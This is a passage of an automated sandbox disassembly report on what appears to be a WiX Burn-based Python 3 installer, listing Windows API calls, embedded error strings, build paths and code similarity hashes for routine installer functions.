                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$c:\agent\_work\138\s\src\burn\engine\uithread.cpp
                                                                                                                                  • API String ID: 2351989216-616715975
                                                                                                                                  • Opcode ID: 88062ed12f04ae753da47b6ad27b6d9c39bcfac3feaa899c260e821545662542
                                                                                                                                  • Instruction ID: 4a66d0ca10b6975ac243ce5d696f4c276a8db2790e0e9ef8db2f343722812c0f
                                                                                                                                  • Opcode Fuzzy Hash: 88062ed12f04ae753da47b6ad27b6d9c39bcfac3feaa899c260e821545662542
                                                                                                                                  • Instruction Fuzzy Hash: EF317276D01229BBDB10DF9A8C45A9FBAA8FF04750F114177B904F7250E6749E008AA9
                                                                                                                                  APIs
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,00485506,?,?), ref: 0049E5D6
                                                                                                                                  • GetLastError.KERNEL32(?,?,00485506,?,?), ref: 0049E5E3
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0049E33A,00000000,00000000,00000000), ref: 0049E642
                                                                                                                                  • GetLastError.KERNEL32(?,?,00485506,?,?), ref: 0049E64F
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00485506,?,?), ref: 0049E68A
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00485506,?,?), ref: 0049E69E
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00485506,?,?), ref: 0049E6AB
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\splashscreen.cpp, xrefs: 0049E604, 0049E670
                                                                                                                                  • Failed to create UI thread., xrefs: 0049E67A
                                                                                                                                  • Failed to create modal event., xrefs: 0049E60E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                  • String ID: Failed to create UI thread.$Failed to create modal event.$c:\agent\_work\138\s\src\burn\engine\splashscreen.cpp
                                                                                                                                  • API String ID: 2351989216-1941576802
                                                                                                                                  • Opcode ID: 642d74aacffa96132a7c6f4d32b13b0228c8eee068a190097efd6bc91b8ad83e
                                                                                                                                  • Instruction ID: 46ae4654c489f2c1353a2cdd445799d0c6434a9dabd0f1ca004d00b131bf4595
                                                                                                                                  • Opcode Fuzzy Hash: 642d74aacffa96132a7c6f4d32b13b0228c8eee068a190097efd6bc91b8ad83e
                                                                                                                                  • Instruction Fuzzy Hash: 30318176D40225BBCB11DF9ACC05E9FBFB8EB50B11F10417BED10F6240E6389E008A99
                                                                                                                                  APIs
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,771B2F60,?,?), ref: 004A13BE
                                                                                                                                  • GetLastError.KERNEL32 ref: 004A13D1
                                                                                                                                  • GetExitCodeThread.KERNEL32(004CB478,00000000), ref: 004A1413
                                                                                                                                  • GetLastError.KERNEL32 ref: 004A1421
                                                                                                                                  • ResetEvent.KERNEL32(004CB450), ref: 004A145C
                                                                                                                                  • GetLastError.KERNEL32 ref: 004A1466
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A13F8, 004A1448, 004A148D
                                                                                                                                  • Failed to get extraction thread exit code., xrefs: 004A1452
                                                                                                                                  • Failed to reset operation complete event., xrefs: 004A1497
                                                                                                                                  • Failed to wait for operation complete event., xrefs: 004A1402
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                  • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 2979751695-2767648441
                                                                                                                                  • Opcode ID: 078651c0e1cd94554eb400e60fd9d2694fe3cce14b4e7bf0fe69c68c66109dda
                                                                                                                                  • Instruction ID: 6d930fa2969183703b81613164a45842aaa643427392642e7110b48eeacfa576
                                                                                                                                  • Opcode Fuzzy Hash: 078651c0e1cd94554eb400e60fd9d2694fe3cce14b4e7bf0fe69c68c66109dda
                                                                                                                                  • Instruction Fuzzy Hash: 16318174A40315EBE7009F698C06BAF77F8EB15711F20416BF845EA2A0E778DA009B6D
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(004CB468,?,00000000,?,0048C289,?,5TH,00000000,?,00497846,?,?,?,?,00000000,?), ref: 004A14D1
                                                                                                                                  • GetLastError.KERNEL32(?,0048C289,?,5TH,00000000,?,00497846,?,?,?,?,00000000,?,?,?,?), ref: 004A14DB
                                                                                                                                  • WaitForSingleObject.KERNEL32(004CB478,000000FF,?,0048C289,?,5TH,00000000,?,00497846,?,?,?,?,00000000,?,?), ref: 004A1515
                                                                                                                                  • GetLastError.KERNEL32(?,0048C289,?,5TH,00000000,?,00497846,?,?,?,?,00000000,?,?,?,?), ref: 004A151F
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,0048C289,?,5TH,00000000,?,00497846,?,?,?,?,00000000), ref: 004A156A
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,0048C289,?,5TH,00000000,?,00497846,?,?,?,?,00000000), ref: 004A1579
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,0048C289,?,5TH,00000000,?,00497846,?,?,?,?,00000000), ref: 004A1588
                                                                                                                                  Strings
                                                                                                                                  • Failed to wait for thread to terminate., xrefs: 004A154D
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A14FF, 004A1543
                                                                                                                                  • Failed to set begin operation event., xrefs: 004A1509
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                  • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 1206859064-76747171
                                                                                                                                  • Opcode ID: 8cd7b677cad321da614e985a2a719a6a5e6029daa3537df348d8fba79f51879b
                                                                                                                                  • Instruction ID: 3a762ac8bdf1d95bbf92943b70179282153e7923b16fe1185c23808659a3e20c
                                                                                                                                  • Opcode Fuzzy Hash: 8cd7b677cad321da614e985a2a719a6a5e6029daa3537df348d8fba79f51879b
                                                                                                                                  • Instruction Fuzzy Hash: AA210733940622B7C7215B66DC0AB56B7A4FF19726F010227F90966AA0D77CEC60CADD
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00484E8D,?,?), ref: 00496A65
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?,00484E8D,?,?), ref: 00496A6B
                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,00484E8D,?,?), ref: 00496A6E
                                                                                                                                  • GetLastError.KERNEL32(?,?,00484E8D,?,?), ref: 00496A78
                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,00484E8D,?,?), ref: 00496AF1
                                                                                                                                  Strings
                                                                                                                                  • burn.filehandle.attached, xrefs: 00496ABE
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\core.cpp, xrefs: 00496A9C
                                                                                                                                  • Failed to append the file handle to the command line., xrefs: 00496AD9
                                                                                                                                  • %ls -%ls=%u, xrefs: 00496AC5
                                                                                                                                  • Failed to duplicate file handle for attached container., xrefs: 00496AA6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                  • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$c:\agent\_work\138\s\src\burn\engine\core.cpp
                                                                                                                                  • API String ID: 4224961946-4194950708
                                                                                                                                  • Opcode ID: 1d4226dddcd46a226a6ceb10c24fe88501909a923dc4d394cea02bf75ab268d9
                                                                                                                                  • Instruction ID: 45f6bd2e7b3260881040c251e3f00c95f877e6bc86141fe282dd96038e4c2d8e
                                                                                                                                  • Opcode Fuzzy Hash: 1d4226dddcd46a226a6ceb10c24fe88501909a923dc4d394cea02bf75ab268d9
                                                                                                                                  • Instruction Fuzzy Hash: 4811B732940625BBCB109BA58D0AE9F7F689F01B70F214227F921F72D0D7789E0096D8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C093D: EnterCriticalSection.KERNEL32(004EC6EC,00000000,?,?,?,0049427F,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00485572,?), ref: 004C094D
                                                                                                                                    • Part of subcall function 004C093D: LeaveCriticalSection.KERNEL32(004EC6EC,?,?,004EC6E4,?,0049427F,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00485572,?), ref: 004C0A94
                                                                                                                                  • OpenEventLogW.ADVAPI32(00000000,Application), ref: 0049428A
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00494296
                                                                                                                                  • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,004D3CC4,00000000), ref: 004942E3
                                                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 004942EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                  • String ID: Application$Failed to open Application event log$Setup$_Failed$c:\agent\_work\138\s\src\burn\engine\logging.cpp$txt
                                                                                                                                  • API String ID: 1844635321-3521639449
                                                                                                                                  • Opcode ID: a58c0b22fd6169b033451249f9e3a3bae48ec2005d7d7530d0d3a8c9d7f7357f
                                                                                                                                  • Instruction ID: 73f92fb06d48d49583a34ab77e3687fdf80d2cd513dbd609ae72705ef60fa126
                                                                                                                                  • Opcode Fuzzy Hash: a58c0b22fd6169b033451249f9e3a3bae48ec2005d7d7530d0d3a8c9d7f7357f
                                                                                                                                  • Instruction Fuzzy Hash: E4F0D6379912717A5A312A229C1AF7B0D6CEAC2F66711017BFC10F62C0DB0C8D0284FE
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00499487
                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 004994AF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$c:\agent\_work\138\s\src\burn\engine\cache.cpp
                                                                                                                                  • API String ID: 1452528299-4273620891
                                                                                                                                  • Opcode ID: 257a69b72825a1c8b9eb505a9ac53f6ced48c073ec1af8471723ad0e034113e7
                                                                                                                                  • Instruction ID: 8eb1e9751689029fc35a69b09b8db4cde22d107055adbb514e3a95a8909109aa
                                                                                                                                  • Opcode Fuzzy Hash: 257a69b72825a1c8b9eb505a9ac53f6ced48c073ec1af8471723ad0e034113e7
                                                                                                                                  • Instruction Fuzzy Hash: BF816472D00229ABDF11DF99C841BEFBBB4AB08714F15012FE904BB240E7789D018BA9
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0049E4E7
                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0049E525
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0049E532
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0049E541
                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0049E54F
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0049E55B
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0049E56C
                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0049E58E
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0049E596
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0049E599
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0049E5A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 409979828-0
                                                                                                                                  • Opcode ID: c8e07310fe7580f070a1911343bb178c8a62fa5a80e462041ce4e4ccaf856937
                                                                                                                                  • Instruction ID: 3155f5042f49213b4e34c5690fb382d287918da78a2cd98c9f359942b2bc655e
                                                                                                                                  • Opcode Fuzzy Hash: c8e07310fe7580f070a1911343bb178c8a62fa5a80e462041ce4e4ccaf856937
                                                                                                                                  • Instruction Fuzzy Hash: C8219A32100104BFCF559FA9DC0DD7B3F68FB49325F16452AFA16861B0E7358810EBA5
                                                                                                                                  Strings
                                                                                                                                  • Failed to copy source path., xrefs: 0049A304
                                                                                                                                  • Failed to get bundle layout directory property., xrefs: 0049A26B
                                                                                                                                  • WixBundleOriginalSource, xrefs: 0049A197
                                                                                                                                  • WixBundleLastUsedSource, xrefs: 0049A17C
                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 0049A250
                                                                                                                                  • Failed to get current process directory., xrefs: 0049A1D6
                                                                                                                                  • Failed to combine last source with source., xrefs: 0049A1F5
                                                                                                                                  • Failed to combine layout source with source., xrefs: 0049A28A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                  • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                  • API String ID: 2767606509-3003062821
                                                                                                                                  • Opcode ID: 577b53cdf321a859bcf9e8406509b6a0d1370456cd8949552c5e460ab1ea0a02
                                                                                                                                  • Instruction ID: 4d4c8bcb187bc5a967087d53add49bbf479a1f57ad67bfa76a796c1e8440b8d2
                                                                                                                                  • Opcode Fuzzy Hash: 577b53cdf321a859bcf9e8406509b6a0d1370456cd8949552c5e460ab1ea0a02
                                                                                                                                  • Instruction Fuzzy Hash: 51817B71D00229ABCF11EFA9D981AAEBBB5AF08714F10053BF910B3350D7799D108BA9
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,771ADFD0,?,004C76B6,?,?), ref: 004C719A
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C7205
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C727D
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C72BC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Compare
                                                                                                                                  • String ID: label$scheme$term
                                                                                                                                  • API String ID: 1324494773-4117840027
                                                                                                                                  • Opcode ID: c517588326bb82d7d58232a9726bc08b733003fa6942a9eff182e0c44faf4b09
                                                                                                                                  • Instruction ID: f4b4a84c45e3cf258b42055f081eb5165333d3286227ebe2a98e2b265086b375
                                                                                                                                  • Opcode Fuzzy Hash: c517588326bb82d7d58232a9726bc08b733003fa6942a9eff182e0c44faf4b09
                                                                                                                                  • Instruction Fuzzy Hash: 34514039905215FBCB51DBA4CC45FAEBBB8EF04721F2442AAF511A72A0DB389E40DF54
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 0048483F
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00484845
                                                                                                                                  • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004848D3
                                                                                                                                  Strings
                                                                                                                                  • wininet.dll, xrefs: 00484872
                                                                                                                                  • Failed to start bootstrapper application., xrefs: 004848A1
                                                                                                                                  • Unexpected return value from message pump., xrefs: 00484929
                                                                                                                                  • Failed to create engine for UX., xrefs: 0048485F
                                                                                                                                  • Failed to load UX., xrefs: 00484888
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engine.cpp, xrefs: 0048491F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$CurrentPeekThread
                                                                                                                                  • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$c:\agent\_work\138\s\src\burn\engine\engine.cpp$wininet.dll
                                                                                                                                  • API String ID: 673430819-242469113
                                                                                                                                  • Opcode ID: 7b354d8cf50107eec53421b9a5a03d0105121aec61c2b58b9bd921f9110b8aeb
                                                                                                                                  • Instruction ID: 9646966ad76760251dd8c551ca83d5672d0a0b1f7adf4d7c34e48708ef20cfe5
                                                                                                                                  • Opcode Fuzzy Hash: 7b354d8cf50107eec53421b9a5a03d0105121aec61c2b58b9bd921f9110b8aeb
                                                                                                                                  • Instruction Fuzzy Hash: D94191B5A00216BFDB50BAA5CC85FBE77ACEF44714F10052BF505E7290DB28AD0587A9
                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,004AAE4C,?,00000001,00000000), ref: 004A9B52
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,004AAE4C,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 004A9B5C
                                                                                                                                  • CopyFileExW.KERNEL32(00000000,00000000,004A99A0,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 004A9BAA
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,004AAE4C,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 004A9BD9
                                                                                                                                  Strings
                                                                                                                                  • Failed to clear readonly bit on payload destination path: %ls, xrefs: 004A9B8B
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\apply.cpp, xrefs: 004A9B80, 004A9BC4, 004A9BFD
                                                                                                                                  • copy, xrefs: 004A9B20
                                                                                                                                  • Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 004A9C0B
                                                                                                                                  • BA aborted copy of payload from: '%ls' to: %ls., xrefs: 004A9BD2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                  • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$c:\agent\_work\138\s\src\burn\engine\apply.cpp$copy
                                                                                                                                  • API String ID: 1969131206-384873077
                                                                                                                                  • Opcode ID: c163a3063ea4dd49c6d22788381f1f073ffa88d66ff93acf660afd4f119c9ece
                                                                                                                                  • Instruction ID: e7b323e262ff7ece0da49d7aa473854e34c782d8e71e1cd97605abb1dc9b3f2a
                                                                                                                                  • Opcode Fuzzy Hash: c163a3063ea4dd49c6d22788381f1f073ffa88d66ff93acf660afd4f119c9ece
                                                                                                                                  • Instruction Fuzzy Hash: CE310736601221BBDB205E569C86F6B7668AF52B50B24802BBD05AB381D62CDD0086FC
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,771ADFD0), ref: 004C707E
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 004C709B
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C70D9
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C711D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
